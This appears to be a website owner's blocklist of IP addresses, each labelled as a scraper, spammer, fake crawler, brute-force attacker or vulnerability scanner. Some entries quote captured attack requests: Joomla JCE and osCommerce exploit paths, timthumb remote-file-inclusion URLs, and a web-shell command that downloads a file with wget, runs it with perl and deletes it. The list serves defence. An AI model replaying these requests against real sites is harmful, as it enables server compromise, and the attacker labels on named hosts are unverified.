Examples: URL//&sa=U&ei=-BCdUqCLIsOihgejtIHgDQ&ved=0CNwCEBYwPg&usg=AFQjCNFYEzdL-QQMRboeQfiO707TUv6nYw
//images/stories/itil.php?rf
173.254.219.250 Hostname: 173.254.219.250.static.quadranet.com
Host: United States – Los Angeles Oc3 Networks & Web Solutions Llc
Hacker probing for vulnerabilities
/+\”host-care.com\”&num=100&hl=en&lr=&ct=clnk&sa=U&ei=nBGeUuHkAdCgsATMvYGoDA&ved=0CC0QIDAAOGQ&usg=AFQjCNH8Iv285aKqjoDhpIw_9tQQOlaIIw
184.175.135.212 Hostname: remote.americanwaste.org
Host: United States – Kalkaska American Waste
Brute force dictionary attacker
162.243.9.72 Host: United States – New York City Digital Ocean Inc. Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
54.232.100.158 Hostname: ec2-54-232-100-158.sa-east-1.compute.amazonaws.com
Host: Brazil – Sao Paulo Amazon.com Inc.
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
50.112.126.117 Hostname: ec2-50-112-126-117.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
Web server: 3 websites – 200plz.com , grepnetstat.com , qrcodegener.com
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
54.252.97.95 Hostname: ec2-54-252-97-95.ap-southeast-2.compute.amazonaws.com
Host: Australia – Sydney Amazon.com Inc.
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
54.249.240.15 Hostname: ec2-54-249-240-15.ap-northeast-1.compute.amazonaws.com
Host: Japan – Tokyo Amazon.com Inc.
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
54.208.110.38 Hostname: ec2-54-208-110-38.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web scraper / Feed embedder
GermCrawler
172.246.33.37 Hostname: 37.33-246-172.rdns.scalabledns.com
Host: United States – Henderson Enzu Inc
Web server: 11 websites
DoS attack
46.137.98.159
Hostname: ec2-46-137-98-159.eu-west-1.compute.amazonaws.com
Host: Ireland – Dublin Amazon Data Services Ireland Ltd
Rogue bot:
Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
175.126.62.151 Host: Korea, Republic Of – Seoul Hanaro Telecom
Web server: 2 websites – dy2004.com , usbas.com
Brute force dictionary attacker
193.253.48.160 Hostname: LMontsouris-656-01-125-160.w193-253.abo.wanadoo.fr
Host: France – Neuilly-sur-seine Orange S.a.
Web server: 2 websites – eckplantes.fr , k-commerce.fr
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
46.4.109.29 Hostname: www .wissenschaftsberater.com
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 3 websites – wissenschaftsberater.com , wissenschaftsberater.net , wissenschaftsberater.org
Hacker – Looking for Joomla JCE Editor exploit
Examples: /images/stories/canz.php
/images/stories/localhosts.php?cmd=wget%20http: //twilightaffairs.com.au/administrator/includes/pcl/robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;perl%20robot.txt;rm%20-fr%20robot.txt
94.132.250.217 Hostname: a94-132-250-217.cpe.netcabo.pt
Host: Portugal Lisbon Tvcabo Portugal S.a.
Faking Googlebot user agent
62.108.119.131 Hostname: ns1.teledot.net
Host: Serbia – Subotica Drustvo Za Telekomunikacije Verat D.o.o Bulevar Vojvode Misica 37
Web server: 2 websites – td.rs , teledot.net
Hacker – Looking for Joomla JCE Editor exploit
Examples: /images/stories/beHbeTT.php?rf
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
54.208.26.43 Hostname: ec2-54-208-26-43.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
GermCrawler – scraper bot
94.20.94.140 Hostname: baku.dot.az
Host: Azerbaijan – Baku Delta Telecom Ltd
Web server: 147 websites
Hacker – Looking for Joomla JCE Editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
182.151.128.46 China – Chengdu Chinanet Sichuan Province Network Hacker – Looking for uploadify RFI exploit
Examples: /wp-content/themes/frankentheme/library/js/uploadify/uploadify.css?
/wp-content/themes/vithy/sprites/js/uploadify/uploadify.css?
/wp-content/plugins/wp-symposium/uploadify/uploadify.css?
42.120.161.96 China – Hangzhou Aliyun Computing Co. Ltd YisouSpider
162.243.81.195 Host: United States – New York City Digital Ocean Inc. Spbot – SEO spy bot
Mozilla/5.0 (compatible; spbot/4.0.2; +http: //www.seoprofiler.com/bot )
178.255.197.24 Hostname: server2.qprivate.nl
Host: Netherlands – Rotterdam Qweb Internet Services B.v.
Web server: 70 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Examples: /images/stories/cliti.php?rf
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
69.174.242.99 Hostname: darwoft.com
Host: United States – San Antonio Serverbeach
Web server: 5 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Examples: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
//images/stories/localhost.php?rf
81.50.199.177 Hostname: ANantes-657-1-60-177.w81-50.abo.wanadoo.fr
Host: France – Nancy Orange S.a.
Spammer
Bad user agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
46.105.228.164 Hostname: filesbomb.com
Host: France – Roubaix Ovh Systems
Web server: 3 websites – filesbomb.biz , filesbomb.com , filesbomb.in
Spammer
Bad host
46.165.196.138 Host: Germany – Frankfurt Am Main Leaseweb Germany Gmbh Malicious user agent: curl/7.27.0
Scanning for phpMyAdmin remote code execution exploits:
Example: /pma/?-s
117.20.100.1 Hostname: aa106.secure.ne.jp
Host: Japan – Tokyo Kddi Web Communications Inc
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/*******/timthumb.php?src=http: //blogger.com.audreymendozamakeup.com/img.php
Fake user agents:
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
37.143.9.118 Hostname: hosted-by.ihc.ru
Host: Russian Federation – Moscow Internet-hosting Ltd
Web server: 14 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/*******/timthumb.php?src=http: //blogger.com.audreymendozamakeup.com/img.php
Fake user agents:
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
212.53.144.38 Hostname: helikraft.com
Host: Germany – Hamburg Artfiles Ip Network
Web server: 1 website – helikraft.com
Hacker – Looking for Joomla JCE editor exploit
Examples: images/stories/mey.php
images/stories/metri.php
images/stories/robot.php
images/stories/stories.php
78.162.69.97 Hostname: 78.162.69.97.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force / dictionary attack on wp-login
Bad host
69.197.166.174 Host: United States – Kansas City Pradeep Sharma Comment spammer
88.190.25.228 Hostname: sd-30437.dedibox.fr
Host: France – Lyon Dedibox Sas.
Web server: 1 website – mon-guide-achat.fr
Brute force / dictionary attack on wp-login
66.249.93.186 Hostname: google-proxy-66-249-93-186.google.com
Host: United States – Mountain View Google Inc.
User agent: Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google (+https://developers.google.com/+/web/snippet/)
Hotlinker
199.187.122.91 Host: United States – Philadelphia Mystik Media
Web server: 1 website – sheerexplorer.com
Scraper bot
75.101.163.248 Hostname: ec2-75-101-163-248.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web server: 10 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
85.214.138.248 Hostname: mail.load-time.com
Host: Germany – Berlin Strato Ag
Web server: 3 websites – check.bz , load-time.com , sinnloseseite.de
LoadTimeBot/0.7
Mozilla/5.0 (compatible; LoadTimeBot/0.7; +http://www.load-time.com/bot.html)
87.238.192.72 Hostname: sh2072.evanzo-server.de
Host: Germany – Berlin Evanzo E-commerce Gmbh Infrastructure
Web server: 1576 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
Example: /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
192.114.71.13 Hostname: bzq-114-71-13.static.bezeqint.net
Host: Israel – Petah Tikva Bezeq International Previously Trendline
Scraper bot
188.34.134.80 Host: Iran – Tehran Asre Enteghal Dadeha Scraper / spammer
173.208.129.211 Host: United States – Kansas City Datashack Internal Servers Comment spammer
198.50.176.167 Host: Canada – Montreal Ovh Comment spammer
Bad host
162.243.110.96 Host: United States – New York City Digital Ocean Inc. Spbot – SEO spy bot
Mozilla/5.0 (compatible; spbot/4.0.2; +http: //www.seoprofiler.com/bot )
78.46.114.178 Hostname: static.178.114.46.78.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 27 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
162.210.196.100 Hostname: hosted-by.leaseweb.com
Host: United States – Manassas Leaseweb Usa Inc.
MAJESTIC Spy bot
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.4; http: //www.majestic12.co.uk/bot.php?+)
41.142.243.102 Host: Morocco – Rabat Ip Adsl Maroctelecom Suspicious activity – looking for URL/+\”nseasy.com\”&num= PLUS LONG STRING
130.75.16.19 Hostname: gcwn19.d-grid.uni-hannover.de
Host: Germany – Hannover Gottfried Wilhelm Leibniz Universitaet Hannover
Malicious user agent:
PycURL/7.19.0.2 libcurl/7.22.0
62.149.23.159 Hostname: ns1.la-primavera.net
Host: Ukraine – Mariupol’ Colocall Ltd.
Web server: 12 websites
Malicious user agent: libwww-perl/6.02
Hacker trying to exploit known Joomla Open Flash Chart arbitrary file upload vulnerability
Examples: //administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=bhl.php
//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bhl.php
//administrator/components/com_jinc/classes/graphics/tmp-upload-images/bhl.php?rf
//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/bhl.php?rf
95.56.234.62 Hostname: www .krosoft.pl
Host: Kazakhstan – Almaty Jsc Kazakhtelecom Direction Of Information System
Web server: 5 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
94.232.217.25 Hostname: www .krosoft.pl
Host: Poland – Krosno Krosnienskie Centrum Informatyczne Krosoft
Web server: 5 websites
Hacker – Malicious bot:
BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit
109.11.122.15 Hostname: 15.122.11.109.rev.sfr.net
Host: France – Boulogne-billancourt Societe Francaise Du Radiotelephone S.a.
Bad User Agent
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36 Squider/0.01
178.168.82.85 Hostname: 178-168-82-85.starnet.md
Host: Moldova – Chisinau Starnet S.r.l
Rogue bot – Mozilla/4.0 (compatible; ICS)
5.9.113.10 Hostname: n10c6.007ac9.net
Host: Germany – Nuremberg Hetzner Online Ag
Apache-HttpClient/4.3 (java 1.5)
212.247.18.197
Hostname: static-212-247-18-197.cust.tele2.se
Host: Sweden – Stockholm It-relation Ects Ab
Unknown bot
User agent – another
176.28.55.107 Hostname: server3.cubehost.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 33 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
5.9.27.74 Hostname: 5-9-27-74.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 1 website – multicopter24.de
Hosting Sistrix crawler
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
109.228.17.95 Hostname: server109-228-17-95.live-servers.net
Host: United Kingdom – Gloucester Fast Hosts Ltd
Web server: 7 websites
Hacker – Looking for Joomla JCE editor exploit vulnerability
/images/stories/borong.gif
212.71.128.179 Host: Czech Republic – Ceske Budejovice Ipex A.s Hacker – Looking for WordPress timthumb RFI exploit
//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=
184.82.29.169 Hostname: 184-82-29-169.superslickydeals.com
Host: United States – Scranton Prime Directive Llc
Web server: 1 website – kids-jumpers.com
Hosting some sort of scraper bot
54.224.191.159 Hostname: ec2-54-224-191-159.compute-1.amazonaws.com
Host: United States – Ashburn Amazon Technologies Inc.
FlipboardProxy
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2; +http: //flipboard.com/browserproxy)
50.18.102.132 Hostname: ec2-50-18-102-132.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon.com Inc.
Google-HTTP-Java-Client/1.17.0-rc (gzip)
Another bot piggy-backing Twitter bot
23.29.122.195 Host: United States – Dallas Incero Llc MetaURI
MetaURI API/2.0 +metauri.com
Another bot piggy-backing Twitter bot
184.169.226.84 Hostname: ec2-184-169-226-84.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon.com Inc.
JS-Kit URL Resolver
JS-Kit URL Resolver, http: //js-kit.com/
Another bot piggy-backing Twitter bot
46.236.24.48 Hostname: ded3120.sysms.net
Host: United Kingdom – Reading Mediasift
TweetmemeBot
Mozilla/5.0 (compatible; TweetmemeBot/3.0; +http: //tweetmeme.com/)
Another bot piggy-backing Twitter bot
98.137.207.111 Hostname: h047.llfs.bf1.yahoo.com
Host: United States – Lockport Yahoo! Inc.
Scraper bot NING/1.0
Another bot piggy-backing Twitter bot
23.22.166.58 Hostname: ec2-23-22-166-58.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Malicious user agent Java/1.6.0_31
Scraper bot ShareThisFetcher/0.1.2
Another bot piggy-backing Twitter bot
46.4.209.18 Hostname: static.18.209.4.46.clients.your-server.de
Host: Germany Gunzenhausen Daniil Mosco.
Web server: 21 websites
Web server – no business pinging another site
37.115.188.210 Hostname: 37-115-188-210-broadband.kyivstar.net
Host: Ukraine – Kiev Kyivstar Pjsc
Hacker – Brute force dictionary attacker
Looking for Bitrix vulnerability
DOS attack lasted for more than 5 hours
108.175.154.219 Hostname: barnacle.arvixe.com
Host: United States – San Mateo Arvixe Llc
Hacker – Looking for Joomla JCE editor exploit vulnerability
/images/stories/localhost.php?rf
77.222.56.203 Hostname: vh81.sweb.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Web server: 1060 websites
Hacker – Looking for Joomla JCE editor exploit vulnerability
/images/stories/cr0t.php?conf
/images/stories/70cpx.php
85.108.237.208 Hostname: 85.108.237.208.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Hacker – Brute force dictionary attacker
Looking for Bitrix vulnerability
68.168.144.26 Hostname: nfdc230.nfdc.net
Host: United States – Woodstock Nfdc Internet
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
64.235.57.208 Hostname: leclub.com.ve
Host: United States Las Vegas Las Vegas Nv Datacenter
Web server: 2 websites – g5mc.com , leclub.com.ve
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
201.55.31.141 Host: Brazil Santo Andre Cia Proc. De Dados Do Estado De S Paulo – Prodesp Faking Googlebot user agent
189.106.165.31 Hostname: 189-106-165-31.user.veloxzone.com.br
Host: Brazil Rio De Janeiro Telemar Norte Leste S.a.
Faking Googlebot user agent
177.103.247.248 Hostname: 177-103-247-248.dsl.telesp.net.br
Host: Brazil Sao Paulo Telefonica Brasil S.a
Faking Googlebot user agent
177.106.86.125 Hostname: 177-106-086-125.xd-dynamic.ctbcnetsuper.com.br
Host: Brazil Uberaba Companhia De Telecomunicacoes Do Brasil Central
Faking Googlebot user agent
150.165.210.54 Host: Brazil Campina Grande Universidade Federal Da Paraiba Faking Googlebot user agent
148.235.151.185 Hostname: customer-148-235-151-185.uninet-ide.com.mx
Host: Mexico Mexico City Uninet S.a. De C.v.
Faking Googlebot user agent
186.212.213.40 Hostname: 186.212.213.40.static.host.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
189.59.58.81 Hostname: 189.59.58.81.dynamic.adsl.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
186.215.36.87 Hostname: 186.215.36.87.static.host.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
200.217.16.178 Host: Brazil Rio De Janeiro Telemar Norte Leste S.a. Faking Googlebot user agent
200.195.165.122 Hostname: srvmail.ricopecas.com.br
Host: Brazil Curitiba Rico Componentes Eletronicos
Faking Googlebot user agent
200.170.228.194 Hostname: mail.mutuadosmagistrados.com.br
Host: Brazil Rio De Janeiro Mutua Dos Magistrados Do Estado Do Rj
Faking Googlebot user agent
177.17.87.77 Hostname: 177.17.87.77.static.host.gvt.net.br
Host: Brazil Curitiba Global Village Telecom
Faking Googlebot user agent
181.48.9.61 Host: Colombia Bogota Telmex Colombia S.a. Faking Googlebot user agent
200.133.123.253 Host: Brazil Rio De Janeiro Associacao Rede Nacional De Ensino E Pesquisa Faking Googlebot user agent
189.91.60.130 Hostname: mail.ibrati.org.br
Host: Brazil Sao Paulo Keraxweb Servicos De Interligacao E Internet Ltda.
Faking Googlebot user agent
179.154.224.122 Hostname: b39ae07a.virtua.com.br
Host: Brazil – Sao Paulo Net Servicos De Comunicacao S.a.
Faking Googlebot user agent
128.140.228.66 Hostname: gts.squadmedia.com
Host: Romania – Bucharest Gts Telecom Srl
Web server: 66 websites
Spammer
41.13.12.185 Hostname: vc-nat-gp-s-41-13-12-185.umts.vodacom.co.za
Host: South Africa – Johannesburg Legal Ip Block For Internet Apn – Midrand Park Southern Gauteng
Identified as Dictionary attacker in Project Honeypot records
5.9.127.154 Hostname: 5-9-127-154.crawler.sistrix.net
Host: Germany – Nuremberg Hetzner Online Ag
Sistrix Crawler
5.10.83.19 Hostname: 5.10.83.19-static.reverse.softlayer.com
Host: Netherlands – Amsterdam Softlayer Dutch Holdings Bv
AHREFS spybot
14.155.209.41 Host: China – Guangzhou Chinanet Guangdong Province Network Web scraper bot
54.237.67.181 Hostname: ec2-54-237-67-181.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Linkdex SEO spy bot
72.13.254.226 Hostname: 226-254-13-72.static.cosmoweb.net
Host: United States – New York City Transbeam Inc.
Malicious user agent:
Java/1.7.0_45
204.236.248.1 Host: United States – Ashburn Amazon.com Inc. RavenCrawler SEO spy bot
186.212.87.136 Hostname: 186.212.87.136.static.host.gvt.net.br Global Village Telecom Faking Googlebot user agent
177.12.89.41 Host: Brazil – Natal J M Da Silva Internet – Me Faking Googlebot user agent
177.0.204.250 Host: Brazil – Brasilia Brasil Telecom S/a – Filial Distrito Federal Faking Googlebot user agent
54.218.191.90 Hostname: ec2-54-218-191-90.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
Malicious user agent:
Python-urllib/2.7
76.20.111.106 Hostname: c-76-20-111-106.hsd1.ca.comcast.net
Host: United States – Tracy Comcast Cable Communications Inc.
Forbidden user agent: Xenu Link Sleuth
50.193.50.145 Hostname: 50-193-50-145-static.hfc.comcastbusiness.net
Host: United States – Mountain View Comcast Cable Communications Holdings Inc
Malicious user agent:
Python-urllib/2.7
210.213.59.125 Host: Thailand – Bangkok Truehisp
Hostname: 210-213-59-125.static.asianet.co.th
Faking Googlebot user agent
58.137.145.248 Host: Thailand – Bangkok Mitr Phol Sugar Corp. Ltd. Faking Googlebot user agent
200.103.247.219 Hostname: 200-103-247-219.ctame705.dsl.brasiltelecom.net.br
Host: Brazil – Brasilia Brasil Telecom S/a – Filial Distrito Federal
Faking Googlebot user agent
174.129.237.157 Hostname: ec2-174-129-237-157.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
User agent: ia_archiver (+http: //www.alexa.com/site/help/webmasters; crawler @alexa.com)
ia_archiver bot
Rule breaker – doesn’t get or ignores robots.txt
46.105.24.12 Hostname: vps17562.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 5 websites
Fake Bingbot user agent
Bad host
151.237.190.139 Host: Sweden – Stockholm Deepak Mehta Fie Spammer
Bad host
198.27.64.145 Hostname: ks4004731.ip-198-27-64.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer – multiple hits on honeypot trap
Bad host
212.253.240.194 Hostname: asy194.as253240.sol.superonline.com
Host: Turkey – Atasehir Superonline Inc.
Dictionary attack on WordPress admin
54.205.95.28 Hostname: ec2-54-205-95-28.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Bad bot: Not a recognised search engine or human browser
CloudACL/Nutch-1.4
119.18.60.252 Host: India – Mumbai Ip Address Pool
Web server: 6 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
194.38.104.47 Hostname: mail.szuper.info.hu
Host: Hungary – Budapest Budapest
Web server: 314 websites
Hacker – Malicious bot: BOT/0.1 (BOT for JCE)
Looking for Joomla JCE editor exploit vulnerability
107.6.95.15 Hostname: secure.onavo.com
Host: United States – New York City Voxel Dot Net Inc.
Non-browser user agent: ICAP-IOD
189.38.90.17 Hostname: web417.uni5.net
Host: Brazil – Porto Alegre Ipv6 Internet Ltda
Web server: 747 websites
Image hotlinker
5.10.83.84 Hostname: 5.10.83.84-static.reverse.softlayer.com
Host: Netherlands – Amsterdam Softlayer Dutch Holdings Bv
Part of Ahrefs spy network
ahrefsbot
91.199.151.76 Hostname: www .onebyte.net
Host: United Kingdom – London Iomart Group Plc
Web server: 5 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
87.76.31.97 Host: United Kingdom – Byfleet Future Hosting Llc
Web server: 1 website – jfcboughton.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.150.164 Hostname: s15437445.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet A
Botnet attacking wpOnlineStore/osCommerce/Zencart
208.125.177.174 Hostname: rrcs-208-125-177-174.nys.biz.rr.com
Host: United States – Buffalo Time Warner Cable Internet Llc
Web server: 4 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
198.27.64.185 Hostname: ks4004771.ip-198-27-64.net
Host: Canada – Montreal Ovh Hosting Inc.
Web server: 1 website – location-villa-luxe-marrakech.com
Spam-bot
Bad host
87.106.191.250 Hostname: s15353499.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 166 websites
Spammer – looking for non-existent /xmlrpc.php
68.156.7.26 Hostname: 26.0.7.156.68.in-addr.arpa
Host: United States – Buford Colorvision Graphics Inc – Asm Lan
Web server: 28 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
110.86.184.10 Host: China – Fuzhou Chinanet Fujian Province Network Hacker – Looking for file upload vulnerability in WordPress image Manager
/wordpress-image-manager/images/secure.php
/wordpress-image-manager/signup.php
206.191.25.90 Hostname: smtp2.mailstratus.ca
Host: Canada – Ottawa Dnsnetworks
Web server: 28 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.199.204.15 Hostname: corebulk.com
Host: Turkey – Izmit Aerotek Bilisim Taahhut Sanayi Ve Ticaret Limited Sirketi
Web server: 1 website – corebulk.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
87.118.92.5 Hostname: ns.km23726-02.keymachine.de
Host: Germany – Erfurt Keyweb Ag
Botnet attacking wpOnlineStore/osCommerce/Zencart
85.10.136.115 Hostname: wpc4375.amenworld.com
Host: France – Paris Amen
Web server: 4 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.197.215 Hostname: s15387689.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – iwebmanage.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.154.98 Hostname: s15449159.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 2 websites – reasonwhy.es , reasonwhy.info
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
82.165.150.228 Hostname: s15440330.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 6 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
81.169.137.117 Hostname: edv-48.com
Host: Germany – Berlin Strato Ag
Web server: 3 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
80.86.90.13 Hostname: euve2242.vserver.de
Host: Germany – Hurth Intergenia Ag
Web server: 2 websites – silesia-aroma.com , world-of-flavor.de
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
72.249.65.50 Host: United States – Saint Louis Real Web Host
Web server: 37 website – bcmempleo.org
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
68.168.144.26 Hostname: nfdc230.nfdc.net
Host: United States – Woodstock Nfdc Internet
Botnet attacking wpOnlineStore/osCommerce/Zencart
62.75.157.159 Hostname: euve22130.startvps.com
Host: Germany – Berlin Intergenia AgDedicated Services
Web server: 1 website – bcmempleo.org
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
212.227.127.37 Hostname: infong288.kundenserver.de
Host: Germany Karlsruhe 1&1 Internet Ag
Botnet attacking wpOnlineStore/osCommerce/Zencart
188.165.201.5 Hostname: ns210177.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 2 websites – giphar.com , gipharmagazine.com
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
117.120.2.129 Host: Singapore – Singapore Readyspace Infra And Dedicated Services
Web server: 25 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
117.120.2.111 Host: Singapore – Singapore Readyspace Infra And Dedicated Services Botnet attacking wpOnlineStore/osCommerce/Zencart
Bad host
109.200.2.66 Hostname: 66-2-200-109.rackcentre.redstation.net.uk
Host: United Kingdom – Gosport Redstation Limited
Botnet attacking wpOnlineStore/osCommerce/Zencart
Bad host
107.6.147.100 Hostname: cutepayal.aileec.com.147.6.107.in-addr.arpa
Host: United States – Chicago Singlehop Inc.
Web server: 5 websites
Website Botnet attacking wpOnlineStore/osCommerce/Zencart
188.165.35.135 Hostname: hosting03.epixelic.net
Host: France – Roubaix Ovh Systems
Web server: 141 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
195.171.72.135 Hostname: oberon.killoch.net
Host: United Kingdom – Barr Barr Ltd
Web server: 25 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
66.7.220.208 Hostname: server.dedicadomvf3.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 562 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
66.7.196.158 Hostname: dime185.dizinc.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 1169 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
186.202.153.33 Hostname: hm6734.locaweb.com.br
Host: Brazil – Sao Joao Batista Locaweb Servicos De Internet S/a
Web server: 355 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
193.224.99.243 Host: United States – Mountain View Outofwall Inc.
Web server: 1 website
Hacker – Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
54.205.219.6 Hostname: ec2-54-205-219-6.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot
Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
70.32.108.113 Hostname: 2nck-j2pr.accessdomain.com
